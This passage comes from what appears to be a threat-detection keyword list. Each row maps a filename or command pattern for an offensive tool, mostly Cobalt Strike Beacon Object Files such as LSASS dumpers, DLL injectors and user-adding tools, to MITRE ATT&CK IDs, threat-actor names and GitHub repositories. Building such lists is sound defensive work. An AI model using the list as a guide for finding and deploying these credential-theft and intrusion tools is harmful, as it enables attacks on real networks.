- T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,0,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*BOF/*procdump/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*bof_allocator*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*bof_helper.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) Creation Helper,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dtmsecurity/bof_helper,1,1,N/A,10,10,198,44,2022-05-03T18:56:14Z,2020-07-01T14:50:29Z -*bof_net_user.c*,offensive_tool_keyword,cobaltstrike,Use windows api to add users which can be used when net is unavailable,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/lengjibo/NetUser,1,1,N/A,10,10,410,90,2021-09-29T14:22:09Z,2020-01-09T08:33:27Z -*bof_net_user.o*,offensive_tool_keyword,cobaltstrike,Use windows api to add users which can be used when net is unavailable,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/lengjibo/NetUser,1,1,N/A,10,10,410,90,2021-09-29T14:22:09Z,2020-01-09T08:33:27Z -*bof_pack.py *,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, 
-*bof_reuse_memory*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*BOF2shellcode*,offensive_tool_keyword,cobaltstrike,POC tool to convert CobaltStrike BOF files to raw shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FalconForceTeam/BOF2shellcode,1,1,N/A,10,10,145,25,2021-11-05T18:37:53Z,2021-11-05T14:29:57Z -*bof2shellcode.py*,offensive_tool_keyword,cobaltstrike,POC tool to convert CobaltStrike BOF files to raw shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FalconForceTeam/BOF2shellcode,1,1,N/A,10,10,145,25,2021-11-05T18:37:53Z,2021-11-05T14:29:57Z -*BOF-DLL-Inject*,offensive_tool_keyword,cobaltstrike,Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 
- T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tomcarver16/BOF-DLL-Inject,1,1,N/A,10,10,140,22,2020-09-03T23:24:31Z,2020-09-03T23:04:30Z -*bofentry::bof_entry*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/wumb0/rust_bof,1,1,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -*BOF-ForeignLsass*,offensive_tool_keyword,cobaltstrike,LSASS Dumping With Foreign Handles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/alfarom256/BOF-ForeignLsass,1,1,N/A,10,10,96,25,2021-08-23T16:57:08Z,2021-08-21T00:19:29Z -*bofhound --*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*bofhound -i *,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*bofhound -o *,offensive_tool_keyword,bofhound,Generate 
BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*bofhound-main*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*BOF-IShellWindows-DCOM.*,offensive_tool_keyword,cobaltstrike,Collection of beacon BOF written to learn windows and cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Yaxser/CobaltStrike-BOF,1,1,N/A,10,10,297,54,2023-02-24T13:12:14Z,2020-10-08T01:12:41Z -*BofLdapSignCheck*,offensive_tool_keyword,cobaltstrike,Beacon Object File & C# project to check LDAP signing,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cube0x0/LdapSignCheck,1,1,N/A,10,10,148,22,2022-10-25T13:36:43Z,2022-02-24T20:25:31Z -*bofloader.bin*,offensive_tool_keyword,cobaltstrike,POC tool to convert CobaltStrike BOF files to raw shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens 
- Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FalconForceTeam/BOF2shellcode,1,1,N/A,10,10,145,25,2021-11-05T18:37:53Z,2021-11-05T14:29:57Z -*BOFMask-main*,offensive_tool_keyword,BOFMask,BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF),T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,Defense Evasion,https://github.com/passthehashbrowns/BOFMask,1,1,N/A,10,1,94,24,2023-06-28T14:35:32Z,2023-06-27T21:19:22Z -*bofnet*SeriousSam.*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/guervild/BOFs,1,1,N/A,10,10,153,27,2022-05-02T16:59:24Z,2021-03-15T23:30:22Z -*BOFNET.Bofs*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet.cna*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*bofnet.cna*,offensive_tool_keyword,nopowershell,NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.,T1059 - T1086 - T1500 - T1564 - T1127 - T1027,TA0002 - TA0003 - TA0005,N/A,N/A,Defense Evasion,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*BOFNET.csproj*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z 
-*BOFNET.dll*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik 